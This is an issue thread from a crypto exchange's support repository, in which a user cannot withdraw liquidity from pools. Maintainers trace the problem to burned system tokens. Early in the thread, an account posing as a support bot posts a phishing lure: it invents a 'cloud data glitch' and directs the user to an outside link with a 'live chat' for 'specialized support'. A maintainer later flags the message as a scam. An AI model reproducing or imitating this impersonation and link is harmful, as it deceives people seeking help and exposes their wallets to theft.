### ISSUE TITLE
Unable to withdrawl from pools

### ISSUE THREAD

**Issue by Digital1989** [FalconX-DEX/Falx-Support#86]
**Describe the bug**
I dont know if this is a bug i honestly doubt it. i think its on my end,i have had this issue before and yall helped me . i am unable to pull my money out of the pools it all ways denies it and says invaled hash rate. i was told to clear my cache in telegeam and something about running on old program. i cant remeber the way yall told me before but if someone can help me out be great. if you need photos let me know. 
**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**

**Comment by helpBot-cmyk** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Falx Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button in the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

> **Describe the bug** A clear and concise description of what the bug is. I dont know if this is a bug i honestly doubt it. i think its on my end,i have had this issue before and yall helped me . i am unable to pull my money out of the pools it all ways denies it and says invaled hash rate. i was told to clear my cache in telegeam and something about running on old program. i cant remeber the way yall told me before but if someone can help me out be great. if you need photos let me know. **To Reproduce** Steps to reproduce the behavior:
> 
> 1. Go to '...'
> 2. Click on '....'
> 3. Scroll down to '....'
> 4. See error
> 
> **Expected behavior** A clear and concise description of what you expected to happen.
> 
> **Screenshots** If applicable, add screenshots to help explain your problem.
> 
> **Desktop (please complete the following information):**
> 
> * OS: [e.g. iOS]
> * Browser [e.g. chrome, safari]
> * Version [e.g. 22]
> 
> **Smartphone (please complete the following information):**
> 
> * Device: [e.g. iPhone6]
> * OS: [e.g. iOS8.1]
> * Browser [e.g. stock browser, safari]
> * Version [e.g. 22]
> 
> **Additional context** Add any other context about the problem here.

**Comment by Lissanro** [comment]
Warning: the comment from a scammer has been deleted. In case you got copy of their message in e-mail, do not click any links!

**Comment by Lissanro** [comment]
Please provide your wallet address or transaction ID that fails.

**Comment by Digital1989** [comment]
78mHh25a3ucPMAqdGQfush1N2xQ4qD1TYcCwhJEX1Kh3

**Comment by Jk0x0kJ** [comment]
Issue is happening because user has burnt the token via following transactions :

https://solscan.io/tx/BKue4DubmFTYA8iypjJ7zBSFUzYpNRwCM3Gkxkw9SXQqA9EEudsmM9261SC9xExhXUoe16o9UFwNHgs3Teq4XMm

https://solscan.io/tx/2TZUL1jAMdtzgYmXALso1y8AaK8N2GicVmx88JVtC8vip3dHr9bghpSTpLjUTdVqGJqyuYkXfaU2kZbefkH5kGS

@Lissanro @Digital1989

**Comment by Digital1989** [comment]
What does that mean? And what’s this have to do with me not being able to
remove liquidity from a pool?

**Comment by Lissanro** [comment]
It looks like you or maybe some blockchain app you are using burned the system token from FalXDex.

Imagine putting something valuable in a safe deposit box but then throwing your key away. It may be possible to restore it, but obviously this will cause delays and will require additional work from staff who are responsible for the safe deposit boxes. I hope this analogy helps to understand the issue.

You need to figure out why the system token was burned the first and the second time and prevent it from happening again to avoid issues in the future.

**Comment by Lissanro** [comment]
@Jk0x0kJ Please provide the user instructions if any action is needed on their side to restore the token.

**Comment by Digital1989** [comment]
So I can’t take my usd out of the pools cause of this? That makes no sense
to me. I’m writing you because I can’t pull my money out of the pools and
yall told me how to do it before by clearing cache and so on. This makes no
sense.

**Comment by Digital1989** [comment]
Last time all it was a simple clear cache and some other stuff just like he
mention in the telegram when I asked.

**Comment by Lissanro** [comment]
Burning tokens is irreversible, and losing your system token that acts as a key means losing access to your assets that require it. If you still have an issue you may try to interact with the system in some other way first like making a swap, there is a chance you may get a new system token and check if that helps. If still does not help, you should have been more careful with your own tokens. It is up to you as a wallet owner to keep your own assets safe. Burning tokens without full understanding of what they do is generally not a good idea. Please make sure to never burn tokens without complete understanding of the nature of the token.

**Comment by Digital1989** [comment]
ok i got it
